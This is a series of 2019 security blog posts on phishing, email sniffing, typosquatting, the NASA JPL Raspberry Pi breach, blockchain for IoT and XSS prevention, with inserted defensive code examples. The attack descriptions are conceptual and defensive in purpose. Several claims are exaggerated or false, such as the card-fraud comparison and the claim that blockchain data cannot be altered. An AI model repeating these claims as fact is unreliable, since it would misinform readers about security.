People do all sorts of things on the internet without thinking about the risk they may be putting themselves in when they click on links to websites they have never heard of, download games and other software from unknown websites just because the site offers them for free, store their sensitive files in a cloud whose provider they know nothing about, and so on. All these unwary acts can lead to people's computer systems being compromised by hackers and their sensitive information being stolen. Different people can fall victim to different types of cyber attacks, and the impact on one victim can be very different from the impact on another. Companies all over the globe conduct research on what people feel is the most prominent and worst threat to them. They take into account all types of threats, such as terrorism, burglary, physical violence, internet fraud, and every other kind of threat you could think of.

It seems from the latest reports on cyber threats in particular that cybercriminals are indeed getting smarter, more intelligent, and are using even more lethal methods to orchestrate cyber attacks. They are using sophisticated attacks like never before to cause significant damage to each and every one of their victims. This has made concerns over security matters increase manifold worldwide. It has been over a decade since the level of concern was this high. A majority of people around the world are mostly worried that attackers may infect their computer systems with some type of malicious software, or may use their skills and various techniques to hack into their systems. The threat from malware remains as prevalent as before.

Further, there are a lot of people who think they are in danger whenever they shop online, and they are even concerned about their safety when using their bank's website for internet banking. Another type of cyber attack that has been bothering a large group of people, and which has surpassed the perceived threat level of things like terrorism, riots, global war, etc., is identity theft. Identity theft is a cybercrime in which threat actors steal a victim's personal information, or other things by which the victim could be identified, and then use that information to impersonate the victim. One more cyber threat that has been seen causing pain to victims is credit card fraud. It has become so common that it can easily be said that more victims fall prey to credit card fraud in a year than there are hairs on a human being's head. Credit card fraud takes place in various ways. Either an attacker somehow steals the actual credit card from the victim and then uses it to perform transactions, or they use other types of information-stealing attacks to steal just the information related to the victim's credit card, such as the card number, security code, etc., and use that information to perform transactions.

Whatever the case may be, cyber attacks are getting very widespread, and people need to be made aware of the threats that they may be facing whether knowingly or unknowingly. People and organisations need to step up their security game if they want to outsmart cyber criminals and save themselves from being attacked, or at least protect themselves from facing massive losses even if some adversary manages to attack them.

Read More

26

June, 2019

Email hacking

Emailing technology has been around for a while now, and it has helped individuals as well as organisations send and receive important information across the internet to others who may or may not be in the same corner of the world as the sender. ...
Emails travel across the globe and pass through various types of systems, such as routers and email servers. It would be wise to think that emails may face several kinds of dangers along their way to the recipient and onto their computer system. This blog discusses how hackers could use various types of cyber attacks to steal the information contained within email messages and how they could use emails as a means to cause damage to their victims.

Attackers compromise emailing systems around the world to steal the sensitive information present in the emails sent and received by their victims. After stealing sensitive data, the threat actors use it for other malicious purposes. They could either use the data directly themselves, or sell it on the dark web to someone interested in getting their hands on that information. One of the ways in which cybercriminals could steal information from email messages is a sniffing attack. In a sniffing attack, a threat actor first connects their hacking system to a wireless access point, or they may find an ethernet cord lying around and attach their system to the local network using that. After connecting their computer to the local network, the attacker could use either software sniffing tools or hardware sniffers to listen for information flowing on the network to and from a target device. They can then capture the information onto their systems, later search it for data related to email messages, and from among the sorted email data pick out the relevant information, which they could use to perform another cyber attack on their victims. For example, when a user is trying to send some secret information via email, and the email service provider happens not to use encryption to secure its users' emails, then cybercriminals would easily be able to capture and read the sniffed email messages. The secret information would be easy to read, as it would be available to the attackers in cleartext.

Another example would be when threat actors manage to sniff a victim's user credentials for their email account while the victim is logging in. Attackers could use the stolen credentials to log in to the victim's email account themselves and then steal all relevant information from there. Emails can also be used to spread malware onto victims' computer systems. This type of attack takes advantage of a little social engineering as well, to lure victims into downloading the email attachments. Several people also make the mistake of blindly opening email attachments without even investigating what they might contain, and then get their systems infected with dangerous malware. There is another type of attack that attackers use to fool victims, called an email spoofing attack. In this cyber attack, adversaries alter the name or email address of the sender and the body of the message to make the fake email look like it was sent by an authentic entity, such as the IT department of the company one works for, or the bank with which a person has an account. Attackers could then pair this attack with a clickbait download attack by inserting a malicious link into the email and making it seem legitimate. Let us take an example of such an attack. Let's say the attacker spoofs an email and makes it look like it was sent by the victim's bank. The email contains instructions telling the victim to change a specific setting in their account, which they can do by navigating to the link given in the email; seeing this, the victim is not alarmed, as the email looks very legitimate. The victim clicks on the link and is taken to a malicious website created by the attacker, which looks exactly like the bank's website. The victim enters their online account credentials and tries to log in. They fail on the first attempt, as the site was just a fake one, but are then redirected to the bank's real website. They try to log in there, and they succeed. What they do not get to know is that when they first submitted their user credentials, the attackers stole them using the bogus website. The attackers can now use those credentials to log in to the victim's online bank account and steal money from the victim.

Emails are a great attack vector for any cybercriminal, and if they are smart enough to use this attack vector, then a great amount of damage can be caused by them. Hence, it is necessary to protect emails and emailing systems from getting compromised and to be vigilant enough to spot those emails coming from adversaries who want to attack victims.

Read More

25

June, 2019

Typosquatting

Alice: Hey! Bob! Could you come over here and help me with something?
Bob: Sure! (Bob comes over to Alice) What is it, Alice? What do you need my help with?
...
Alice: I have an important class right now, but there is one thing that I really need to buy right now as only one is available on the website, and only they sell the best quality stuff. If I give you my laptop, then could you go online and buy that thing for me? Please!
Bob: Umm. Ok. I guess I could help you with that. Give me your laptop.
Alice: Oh! You are so sweet, Bob! Here is my laptop. The website is xyz.com, and I need to buy a stethoscope from there. It will be the only stethoscope on the site, so you would not have trouble finding it. Just order it and choose the payment option to be cash on delivery. You already have my address. Ship it there. I will take my laptop from you after my class. Thank you!
Bob: You are welcome, Alice!

Bob boots up Alice's laptop and opens a web browser. But when trying to navigate to the xyz.com website, he makes a mistake while typing the URL and types xyx.com instead of xyz.com. The web browser loads the xyx.com website, but Bob does not notice what has happened. The reason Bob did not notice anything is that the xyx.com website looked exactly like the xyz.com website, and Bob did not look at the URL at the top of the web page after the page had finished loading. Bob used the site to order what Alice had asked him to, but he had to pay with his own credit card, as he found that the cash on delivery option was not available on the website. When Alice did not receive the product on the expected date, she asked Bob whether he had ordered it correctly. They both sat together and tried to figure out what had happened. After investigating for quite some time, they finally found out why the stethoscope had not been delivered. They were totally shocked to see that the website Bob had used to order was really a malicious website created by cybercriminals. They had taken advantage of the misspelt URL to lure Bob into navigating to the bogus site and ordering the product, and through this they had stolen Bob's hard-earned money. This type of attack, in which hackers take advantage of a victim's minor mistake of mistyping a URL into a web browser to get them to visit a fake website created by them, and then use that to cause severe damage, is called typosquatting.

Threat actors use their clever minds to figure out how people can make mistakes while typing a URL, and then they register a domain name that is very similar to an existing one which they think a lot of people visit. Adversaries not only take advantage of the domain name to lure victims; many times they also leverage the fact that a lot of people mistype the top-level domain. An example of this is someone typing '.og' instead of '.org', as can happen when a person is typing too fast or not paying much attention to what they are typing, and then hitting the enter key after typing in whatever URL. Attackers can prey on a large number of victims using this attack, as humans make a lot of mistakes while typing on a computer, and as a result a lot of damage can be caused by cybercriminals through this attack.
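As an added defensive illustration (not code from the original post), here is a C check of the kind a browser extension or forward proxy could run before a page loads: it flags a typed hostname that sits within one or two keystrokes of a domain on a known-good list, catching both the xyx.com slip from the story and the '.og' for '.org' TLD typo. The allow-list (xyz.com plus a constructed example.org), the hostname length limit and the inputs are all constructed for the demo.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed demo limit: hostnames longer than this are not checked. */
#define MAX_HOST 64

/* Constructed allow-list of domains known to be genuine (xyz.com from the
 * story above plus a made-up example.org); not a real list. */
const char *const KNOWN_GOOD[] = { "xyz.com", "example.org" };
#define N_KNOWN_GOOD (sizeof KNOWN_GOOD / sizeof KNOWN_GOOD[0])

/* Levenshtein (edit) distance: the number of single-character insertions,
 * deletions or substitutions that turn a into b.  One slipped key
 * (xyz -> xyx) or one dropped letter (.org -> .og) is distance 1. */
static size_t edit_distance(const char *a, const char *b)
{
    size_t la = strlen(a), lb = strlen(b);
    size_t prev[MAX_HOST + 1], cur[MAX_HOST + 1];

    for (size_t j = 0; j <= lb; j++)
        prev[j] = j;
    for (size_t i = 1; i <= la; i++) {
        cur[0] = i;
        for (size_t j = 1; j <= lb; j++) {
            size_t cost = (a[i - 1] == b[j - 1]) ? 0 : 1;
            size_t del = prev[j] + 1;
            size_t ins = cur[j - 1] + 1;
            size_t sub = prev[j - 1] + cost;
            size_t best = del < ins ? del : ins;
            cur[j] = best < sub ? best : sub;
        }
        memcpy(prev, cur, sizeof cur);
    }
    return prev[lb];
}

/* Copy a hostname into out in lower case (DNS names are case-insensitive).
 * Returns 0 if the name is too long for this demo. */
static int normalise(const char *in, char *out)
{
    size_t n = strlen(in);
    if (n > MAX_HOST)
        return 0;
    for (size_t i = 0; i <= n; i++)      /* <= copies the NUL too */
        out[i] = (char)tolower((unsigned char)in[i]);
    return 1;
}

/* Given the hostname a user typed and the allow-list, return the known
 * domain it is a near miss of (edit distance 1 or 2 but not identical), or
 * NULL when the name is an exact match or not close enough to be suspicious. */
const char *lookalike_of(const char *typed, const char *const *known, size_t nknown)
{
    char t[MAX_HOST + 1], k[MAX_HOST + 1];
    const char *best = NULL;
    size_t best_d = 3;                    /* only distances 1 and 2 count */

    if (!normalise(typed, t))
        return NULL;
    /* First pass: an exact match is the genuine site, never a lookalike. */
    for (size_t i = 0; i < nknown; i++)
        if (normalise(known[i], k) && strcmp(t, k) == 0)
            return NULL;
    /* Second pass: pick the closest known domain within the threshold. */
    for (size_t i = 0; i < nknown; i++) {
        if (!normalise(known[i], k))
            continue;
        size_t d = edit_distance(t, k);
        if (d < best_d) {
            best_d = d;
            best = known[i];
        }
    }
    return best;
}

int main(void)
{
    /* constructed inputs: the genuine site, the typo from the story, a
     * dropped-letter TLD, an upper-case genuine name, and an unrelated host */
    const char *typed[] = { "xyz.com", "xyx.com", "example.og",
                            "EXAMPLE.ORG", "unrelated.net" };
    for (size_t i = 0; i < sizeof typed / sizeof typed[0]; i++) {
        const char *hit = lookalike_of(typed[i], KNOWN_GOOD, N_KNOWN_GOOD);
        printf("%-14s -> %s\n", typed[i], hit ? hit : "ok");
    }
    return 0;
}
```

The distance threshold is a trade-off: very short domains sit within two edits of many legitimate names, so a real deployment would tune it per domain length or pair it with an allow-list of sibling domains.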

This particular cybercrime is considered to be so dangerous that some countries even have special laws in place to protect people from this cybercrime. People need to protect themselves too by staying vigilant all the time.

Read More

24

June, 2019

Stop them from sniffing

Attackers use sniffing attacks to steal all sorts of information that they use immediately, or in the future when performing a more sophisticated and highly targeted cyber attack on their victim. This blog talks about ...
the impact of a sniffing attack and how this kind of cyber attack can be prevented from causing damage to victims.

Let us consider an example to understand the severity of a sniffing attack. The day is Friday. Bob gets off work, goes straight to his favourite restaurant and orders his favourite dish, the cheeseburger. While waiting for his order, Bob takes out his laptop and connects it to the restaurant's open wireless network. Sitting at the table, he navigates to his favourite streaming website, enters his login credentials and logs in. He is greeted with a notification saying that his subscription needs to be renewed for him to continue watching his favourite TV shows and movies. As Bob really enjoys his favourite shows, he pops his credit card out of his wallet and enters all the card details in the payment form. He clicks submit, and finally has his subscription up and running again. As soon as Bob starts watching his show, his burger arrives, and he happily enjoys his time. A day later, he receives an SMS message saying that a transaction has been made at a certain online store to purchase some electronic goods. He is shocked to see the message, as he made no such purchase himself. Well, it turns out that Bob's credit card information was stolen at the restaurant he visited on Friday. A hacker had used a sniffing attack to steal Bob's credit card details while he was using them to renew his video streaming subscription at the restaurant. This is not a rare occurrence in public places that have open wireless networks for people to use while they are there.

As seen in the example, threat actors use a sniffing attack to steal sensitive information, such as payment card details, user credentials for online accounts, bank account information, and so on. Countermeasures should be implemented by individuals as well as organisations to prevent sniffing attacks and protect sensitive data from being stolen. One recommendation is to use a wireless network only if the wireless access point is secured with a strong password, such as when a restaurant offers free WiFi and provides you with the password to connect to it. This makes sure that people outside the premises cannot connect to the wireless access point, which makes it a little more secure than an open wireless network that everyone can connect to without a password or PIN. An unsecured wireless network is very susceptible to sniffing attacks, as you may have noticed by now. Someone could be connected to the open network, sniffing all the network traffic flowing through the access point and stealing information. Well, someone connected to a secured WiFi network could also be sniffing, but the chances are lower than on an open wireless network.

When you are out and about in a public place, it is better to use your own personal hotspot, because there is less chance of it being compromised or of attackers being connected to it, so there would hardly be a chance of someone sniffing the network. Another good practice is that if the work you want to do online can be done using only your smartphone, then use your smartphone and access the internet over your phone's cellular network, as this reduces the risk of an attacker sniffing the network even further.

If no other option is available and one definitely has to use a public wireless network, then it should be made sure that secure communication channels are used. For example, when accessing online resources, a Virtual Private Network could be used, which encrypts all the traffic flowing between your device and the destination and makes it very hard for a cybercriminal to make sense of what is going on in the network.

Organisations should use proper access control mechanisms to prevent unknown devices from connecting to a particular wireless access point. MAC address filtering can help with this effort as it would only allow those devices to connect to the access point whose MAC address is present in the access control list.

These were some of the ways that can help protect against sniffing attacks and reduce the risk of further damage. Sniffing attacks are very sneaky, and thus, care should be taken to prevent the sensitive information flowing across networks from getting stolen by adversaries.


24

June, 2019

Hackers Used Raspberry Pi To Breach NASA

A Raspberry Pi is a tiny computer that can deliver surprisingly capable performance, and a recent report confirmed that a NASA laboratory was hacked using one. ...
In this week's report, the U.S. Office of the Inspector General said that someone had connected an unauthorized Raspberry Pi, a basic computer that costs $25-$35, to the network. An intruder was then able to use the credit-card-sized computer as a springboard into two of the Jet Propulsion Laboratory's primary network systems and steal up to 500 megabytes of data from 23 records.

Two of these documents were subject to the International Traffic in Arms Regulations and concerned the Mars Science Laboratory mission, which includes the Curiosity rover. Besides other useful data, the rover collected soil and rock specimens from the Red Planet.

Although NASA's hack is of considerable interest in its own right, it at least triggered an audit that revealed how poor the general security posture within the space agency is. Because the network was shared rather than segmented, hackers were able to move freely between the distinct devices within it. This raised the concern that hackers might gain access to flight systems and initiate 'malicious signals for space flight missions'. JPL, located outside Pasadena, Calif., did not comment. Who connected the Raspberry Pi to the JPL network, and who was behind the attack, remains unknown.

After being informed of the hack, the Johnson Space Center in Houston disconnected its systems from the compromised JPL gateway, out of concern that the hacker might move into its mission applications. NASA also said that the hack opened the door to possible control of the Deep Space Network, a global radio antenna system that gathers information from interplanetary space missions and commands them, as well as some missions that orbit Earth. The Johnson Space Center's disconnection was a precautionary measure.

In its report, OIG explains:

In addition, when adding equipment to the network, the system administrators did not update the inventory system continuously. In particular, we discovered that 8 out of 11 system administrators who manage 13 installations within our sample have a distinct inventory table, from which they manually update the data in the ITSDB Inventory. A system administrator informed us not to insert fresh equipment frequently into the ITSDB when necessary because sometimes the database update feature does not work and later forgets to provide the data about the asset. Accordingly, assets can be integrated into the network without the safety officers identifying them correctly and examining them.

The cyber-attack in April 2018 exploited that specific weakness by targeting a Raspberry Pi laptop which was not allowed into the JPL network when the hacker accessed the JPL network. Without the JPL [Chief Information Officer Office] review and approval, the device should not have been allowed on the JPL network.

Raspberry Pis are popular because they provide an inexpensive platform that is ideal for tinkering. JPL has found out how even a cheap machine with a cute name can undermine systems that send robots into space.


22

June, 2019

Sniffing attacks causing sneezes

Hackers use different techniques to attack their victims, but their motive is usually the same. They either want to steal money or some kind of sensitive information. For each of their purposes, they come up with various types of attacks, which help them achieve their tasks. ...
Cyber attacks are usually used to steal user or company information or are used as an initial phase for a further, more sophisticated type of cyber attack. This blog talks about a specific type of cyber attack called sniffing and how it can be used to steal sensitive information by threat actors, and also the ways it can be used as the initial step for a more massive cyber attack on a target victim.

Sniffing is a type of cyber attack in which adversaries use different kinds of tactics, techniques, and tools to listen in on network traffic and steal the required information from the flowing network traffic. In other words, the attackers can connect their attacking devices to a target network, and use sniffing tools to intercept the local area network traffic flowing on the network. One of the ways cybercriminals usually start performing this attack is by first compromising a wireless access point to which the client device of their target is connected, or if the network is a wired one then they could use cable taps to tap into the network cable and connect to the network, but that is usually not an easy task for the attackers. Victims who have not adequately secured their wireless access points with strong passwords or those who do not follow network security best practices are the ones who are considered to be the most vulnerable to this type of attack and often become the targets of cybercriminals. Another great watering hole which threat actors can take advantage of is an open wireless network present at a public place, such as a restaurant or an airport. The open wireless networks present at public places are considered as an attraction by people visiting those places. Even children nowadays cannot live without the internet.

Child: Hey! Mom. Is there Wi-Fi at that restaurant?
Mom: Yes!
Child: Ok! Let's go there then.
Little do people know about the dangers of using an open public network. Threat actors usually blend in with the crowd, and while connected to the open wireless access points, they keep on sniffing all the network traffic flowing through that particular access point. By using multiple sniffing tools and capturing network packets, they manage to gather a lot of information regarding the targets. The attackers then analyse all the captured data and find relevant information that they could use for their other malicious purposes. The information that they seek is mostly victims' usernames, passwords, text messages, emails, SMB data, etc. If they discover someone's login credentials, then they first try to figure out, for example, which website those credentials belong to and then use those credentials to log in to the victim's online account and perform malicious activities.

Threat actors can also use sniffing for stealing information from Syslog servers, the Telnet service if it is being used in the network, users' chat sessions, or other types of information that can be used to cause damage to a victim. If the information traversing the network is unencrypted, then that makes it even easier for the attacker to find relevant information. Most attackers use software sniffing tools for stealing data, but if an attacker has more access to the target premises, then there are also hardware sniffers that they could use for this attack. Different approaches are used by adversaries to sniff a network. Some of those approaches are ARP sniffing, application-level sniffing, sniffing according to a protocol, web password sniffing, sniffing a LAN, and stealing a TCP session. Each of these approaches is used to steal different types of information from the victims. ARP sniffing is used for stealing IP and MAC addresses, application-level sniffing is used for stealing details about specific applications running on a target host, protocol sniffing is used to gather data related to one particular protocol only, web password sniffing is used to steal HTTP sessions that are then parsed for stealing victims' usernames and passwords, and LAN sniffing is used to gather details regarding internal hosts such as open ports. Attackers steal TCP sessions by sniffing all traffic flowing between a source and a destination Internet Protocol address and then using the stolen information to create fake TCP sessions that would fool the original source and destination hosts. So, these are some of the ways that a sniffing attack can take place and what the attackers use this type of attack for.

Sniffing is really hard to detect because attackers do not engage with the target host directly and only passively listen to the information flowing on a network. This makes this attack even more dangerous, and security controls should be put in place to prevent this attack from happening.
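The cleartext services the two sniffing posts above single out (Telnet, Syslog, HTTP logins and session cookies) can be checked for in a capture before an adversary reads them. The following Python audit is an added example, not code from the blog; the flow records, hosts, port table and risk levels are constructed for illustration.

```python
"""Audit captured network flows for data that a passive sniffer could read in the clear."""
from dataclasses import dataclass
from typing import Dict, List
from urllib.parse import parse_qs

# Assumed classification tables (constructed for this example).
CLEARTEXT_PORTS = {
    23: "Telnet: credentials and the whole session travel in the clear",
    514: "Syslog over UDP: log contents readable on the wire",
    80: "HTTP: pages, cookies and form data unencrypted",
}
ENCRYPTED_PORTS = {443: "HTTPS", 22: "SSH", 6514: "Syslog over TLS"}
CREDENTIAL_FIELDS = {"password", "passwd", "pwd", "pass"}


@dataclass
class Flow:
    src: str
    dst: str
    dst_port: int
    transport: str   # "tcp" or "udp"
    payload: bytes   # first bytes of the client's data


def http_credential_indicators(payload: bytes) -> List[str]:
    """Return where an HTTP request carries a credential or session token in clear text."""
    text = payload.decode("utf-8", errors="replace")
    head, _, body = text.partition("\r\n\r\n")
    found = []
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(":")
        name = name.strip().lower()
        if name == "authorization":
            scheme = value.strip().split(" ", 1)[0]
            found.append(f"Authorization header ({scheme})")
        elif name == "cookie":
            found.append("Cookie header (session token)")
    if body:
        for field in parse_qs(body, keep_blank_values=True):
            if field.lower() in CREDENTIAL_FIELDS:
                found.append(f"form field '{field}'")
    return found


def assess_flow(flow: Flow) -> Dict:
    """Classify one flow by what someone sniffing the same access point could recover."""
    if flow.dst_port in ENCRYPTED_PORTS:
        return {"dst_port": flow.dst_port, "risk": "low", "indicators": [],
                "reason": f"{ENCRYPTED_PORTS[flow.dst_port]} is encrypted end to end"}
    if flow.dst_port in CLEARTEXT_PORTS:
        indicators = http_credential_indicators(flow.payload) if flow.dst_port == 80 else []
        # Telnet always exposes the login; HTTP is "high" only when a credential is visible.
        risk = "high" if indicators or flow.dst_port == 23 else "medium"
        return {"dst_port": flow.dst_port, "risk": risk, "indicators": indicators,
                "reason": CLEARTEXT_PORTS[flow.dst_port]}
    return {"dst_port": flow.dst_port, "risk": "unknown", "indicators": [],
            "reason": "unrecognised service; confirm whether it uses TLS or a VPN"}


def audit(flows: List[Flow]) -> List[Dict]:
    return [assess_flow(f) for f in flows]


# Constructed sample capture from a client on a shared wireless network.
SAMPLE_FLOWS = [
    Flow("10.0.0.5", "10.0.0.1", 80, "tcp",
         b"POST /login HTTP/1.1\r\nHost: intranet.example\r\nCookie: sid=abc123\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
         b"username=alice&password=hunter2"),
    Flow("10.0.0.5", "10.0.0.9", 80, "tcp", b"GET /news HTTP/1.1\r\nHost: www.example\r\n\r\n"),
    Flow("10.0.0.5", "10.0.0.20", 23, "tcp", b"login: alice\r\n"),
    Flow("10.0.0.5", "10.0.0.30", 514, "udp", b"<34>Jun 22 10:00:00 host sshd: Failed password"),
    Flow("10.0.0.5", "203.0.113.7", 443, "tcp", b"\x16\x03\x01\x02\x00"),
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_FLOWS):
        print(finding)
```

Flows rated high or medium are the ones a VPN or a TLS-only policy would move into the low bucket.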


22

June, 2019

Securing IoT Using BlockChain

Everybody has heard terms like blockchain, security, secure IoT data, cryptocurrency and so on. The popularity of these technologies has grown, and they will remain a topic in the future. But how can blockchain help secure IoT data? ...
Blockchain was previously linked only to cryptocurrencies. Blockchain technology is now used in many ways, and it is helpful for many other purposes because the information is spread throughout the chain (the blockchain). In the case of the IoT, or Internet of Things, all devices can communicate without the need for human intervention.


We all know what Blockchain is by now.

Originally, blockchain was used only for trading cryptocurrencies. It is useful as a ledger in which individual members make entries with the approval of other members. The information is stored throughout the chain in various blocks. It is not simple to build blocks in this ledger; it takes a lot of time and processing to make a single block. Every block contains a reference to the previous entries, and in this manner it forms a chain.

Though it is challenging to create a block, it is equally challenging to tamper with the information in a block.
A person or a business would have to manipulate all the blocks in order to alter a single one, which is nearly impossible. In the first place, the sophisticated technology involved in building the chain makes the information more secure and reliable. Another distinctive characteristic of blockchain technology is that there is no centralised organisation monitoring the information; the members handle the group's operations themselves. Keeping away from a central control point makes blockchain data more reliable, because there is no central agency that can be manipulated or corrupted.

The problem with most data storage is that it is held in one place and is easy for attackers to target.
If a hacker is able to breach that one location, all the information is exposed. Blockchain technology makes it almost impossible for anyone to breach and steal the information held in blocks across the chain. The system's logistics and business parameters make it ideal for the secure storage of information.
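To make the "reference to the past entries" and the tamper resistance concrete, here is an added Python example (not code from the post) of a minimal hash chain with a small proof-of-work; the sensor readings and the DIFFICULTY setting are assumed for illustration.

```python
"""Minimal hash chain: each block commits to the previous block's digest, so editing any
block breaks every link after it.  Added example; not the blog's or any project's code."""
import hashlib
import json
from dataclasses import dataclass
from typing import List, Tuple

DIFFICULTY = 3          # leading hex zeros required per block; small so the demo runs fast
GENESIS_PREV = "0" * 64  # the first block has no predecessor


@dataclass
class Block:
    index: int
    data: str
    prev_hash: str   # digest of the previous block: the "reference to the past entries"
    nonce: int = 0   # adjusted during mining until the digest meets DIFFICULTY

    def digest(self) -> str:
        payload = json.dumps([self.index, self.data, self.prev_hash, self.nonce]).encode()
        return hashlib.sha256(payload).hexdigest()


def mine(block: Block) -> Block:
    """The 'lot of time and processing' per block: search for a nonce meeting the target."""
    while not block.digest().startswith("0" * DIFFICULTY):
        block.nonce += 1
    return block


def add_block(chain: List[Block], data: str) -> Block:
    prev_hash = chain[-1].digest() if chain else GENESIS_PREV
    block = mine(Block(len(chain), data, prev_hash))
    chain.append(block)
    return block


def verify_chain(chain: List[Block]) -> Tuple[bool, int]:
    """Return (ok, first_bad_index); index is -1 when every link holds."""
    for i, block in enumerate(chain):
        expected_prev = chain[i - 1].digest() if i else GENESIS_PREV
        if (block.index != i
                or block.prev_hash != expected_prev
                or not block.digest().startswith("0" * DIFFICULTY)):
            return False, i
    return True, -1


def build_demo_chain() -> List[Block]:
    """Constructed IoT-style readings appended one block at a time."""
    chain: List[Block] = []
    for reading in ["sensor-17 temp=21.4", "sensor-17 temp=21.6", "sensor-17 temp=35.0"]:
        add_block(chain, reading)
    return chain


if __name__ == "__main__":
    chain = build_demo_chain()
    print("valid:", verify_chain(chain))
    chain[1].data = "sensor-17 temp=99.9"   # silently edit a stored reading
    print("after tampering:", verify_chain(chain))
```

An attacker who edits block 1 would have to re-mine it and every later block to restore the chain, which is the work the post describes as nearly impossible on a shared ledger.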

Security Challenges In IoT

In the present IoT system, all the data is authenticated centrally.
Data is transmitted securely and is regarded as safe. Every device in an IoT setting is accessible from the internet. Every piece of data is stored in convenient cloud storage, and cloud storage can be altered or stolen by anyone who gains access to it. This access is the threat IoT is currently facing. Companies are vying with each other to supply the maximum number of IoT devices.
In another ten years, the number of such machines will be enormous, and hackers will have more opportunities to access your information. Unethical hackers can get into the system and reach the main data storage via any device. We witnessed an attack in 2016 that impacted nearly every IoT device: an extensive criminal assault was carried out by DDoS (distributed denial of service). With the spread of IoT data, people realised that this security lapse was serious. IoT is so widespread that almost all industries are affected, and it produces a huge amount of data. In healthcare, every patient's health data is accessible.

Consider a breach of the data storage of an insurance company.
The attackers could access millions of people's private data. They could disrupt the system and hold it for ransom. The danger posed by black hat hackers is genuine and always has been; with unprotected devices, we have simply made hacking easier for them. Consider a situation where all your equipment is connected to your IT network. Hackers can get into the rest of the system through the smallest device.

Think about the information connected in your home or company.
All of that data, including passwords, accounts and so on, is accessible on your IT network. For an expert hacker, or even a low-level one, it would be child's play to introduce ransomware and lock up all the equipment, particularly when it is all in one place.

How Can Blockchain Help In Securing IoT?

The blockchain is a decentralised system that helps solve IoT scalability, trustworthiness and data protection issues. The blockchain can allow trillions of devices to be tracked. Blockchain technology can contribute to the processing and coordination of transactions between the distinct devices in a system. The decentralised nature of the blockchain helps distribute data and eliminates attacks on single points of failure.

Blockchain technology will make the ecosystem more secure and resistant to attacks. In such a setting, consumer information will stay safer. The blockchain technique has also been proven in cryptocurrency transactions, which shows that a central authority is unnecessary for peer-to-peer payment systems. In IoT, blockchain enables communication between devices and people. Since the data is dispersed across the ledger, it cannot be altered. In addition, the blockchain keeps the history of smart devices, and you cannot modify it in any manner. Without a central control agency, smart devices can operate autonomously.

Any modern IoT application development company can use blockchain technology and create a dApp which will help in securing data.
The blockchain is a decentralized system that can help track the billions of devices.
It is possible to distribute data and protect from attacks.
You cannot alter data in a blockchain.
Blockchain allows you to use smart contracts to satisfy agreements before the exchange of messages.
This system allows IoT to maintain a ledger of all transactions.
Blockchain ensures the safety of data in IoT.

Challenges In Incorporating Blockchain in IoT

While it appears to be the best and easiest option for securing information in an IoT setting, it is far from ideal. The only consolation is that IoT itself is not fully established, so blockchain technology can still be integrated into the scheme easily. The blockchain works effectively to protect information in a cryptocurrency ledger, as that is just about moving currency to another individual, and blockchain assists in this process without the control of any central agency. But it may prove more difficult to manage a network of appliances across various layers.

Conclusion

IoT is here to develop and expand; that much is obvious. However, the risk to the information generated by the technology is also a reality. There is sensitive information that could be attacked and stolen, and this problem needs to be tackled. The blockchain, a technology with decentralised data storage, seems to be the right tool for the job. Another recommendation is for blockchain software developers to create a dApp and have it take over control of the smart devices in the office and provide protection against breaches. dApp is short for decentralised application: a dApp runs its backend code on a decentralised peer-to-peer network.


21

June, 2019

Preventing Cross-Site Scripting

The world is full of vulnerabilities, and hackers take advantage of those vulnerabilities to attack their target victims. It has been proven that human beings are the weakest link in the security chain because of reasons that are highly unavoidable by humans as they are a part of human nature, such as trusting someone, having emotions and things like that. ...
Apart from this, there are a lot of things in the world of security that require an explanation. There are a lot of security threats from which victims need to protect themselves. This blog talks about a specific type of cyber attack called cross-site scripting or XSS attack, and what security measures can be taken so that the attackers can be prevented from attacking their targets and the risk can be reduced considerably.

A cross-site scripting attack is an attack that takes advantage of a cross-site scripting vulnerability present in a web application to cause damage to the victims. Using a cross-site scripting attack, threat actors can perform various other malicious activities, such as stealing sensitive cookie data from a victim's computer system. There are three types of cross-site scripting attacks; namely, the DOM-based XSS attack, the reflective XSS attack, and the stored XSS attack. All three types of XSS attacks differ from each other in the way they are performed and the kind of cross-site scripting vulnerability they exploit. Among these, the most dangerous one is stored XSS, as it can be made persistent on a target server, whereas the other two are not considered to be that important by attackers because they require social engineering to a certain degree for the whole attack to be successful.

Organisations can prevent cross-site scripting attacks from occurring by taking specific countermeasures related to the attack. One of the most critical steps that organisations should take is to either hire web developers who are well versed with programming skills and know how to write source code using secure coding techniques, or provide appropriate training to the already existing developers and help them learn techniques that would aid them in programming securely. Hiring skilled developers or providing training to the existing ones will help the organisation make sure that their website is being created using secure methods and that they are not vulnerable to a cross-site scripting vulnerability.

The developers who are responsible for creating and maintaining the website should make sure that there are no loopholes present in the site that could allow a cyber-criminal to hack into the website. One of the techniques that developers should use to prevent cross-site scripting is implementing appropriate input validation when taking inputs from users into any input field present on the website. What input validation does is that it checks a user input and sees whether inappropriate characters or strings have been entered as an input, such as a malicious computer script. After this, if there is any inappropriate input, then certain operations are performed on the input data according to some preset rules before letting the data pass onto a dynamically generated web page. The developers should also encode any output so that the web browser which the web application is being run on does not execute any malicious user-supplied content, such as a script injected by an adversary. Putting security measures in place would also protect the users of a web application from session hijacking attacks that leverage cross-site scripting attacks to steal sensitive session cookies. The HTTPOnly cookie flag must also be turned on for any sensitive cookies being used by the web application.

It is highly crucial for an organisation to put security controls in place and prevent cross-site scripting attacks because there can be lethal consequences of an XSS attack from which people need to be protected.


17

June, 2019

Cross-site scripting attack

Companies nowadays keep on creating various web applications for their customers to use. These web applications offer numerous types of services to users, such as online chatting, access to cloud resources, online banking, and so on. ...
When the users of these web applications give positive feedback, the developers are delighted too, as they are the ones who created the web application. On reaching their milestones, developers and the companies they work for celebrate. But what about the times when security vulnerabilities are discovered in their web applications? Well, no one likes to talk about those times. In this blog, one of the most dangerous web application vulnerabilities is discussed, along with how it can be taken advantage of by hackers to attack their target victims. The vulnerability we are talking about is the cross-site scripting web application vulnerability. Attackers can use this vulnerability to perform a cross-site scripting (XSS) attack and cause severe damage to their victims. They can steal sensitive information, or they could perform other malicious activities through this attack, and the more people visit a website that is vulnerable to cross-site scripting, the worse the impact.

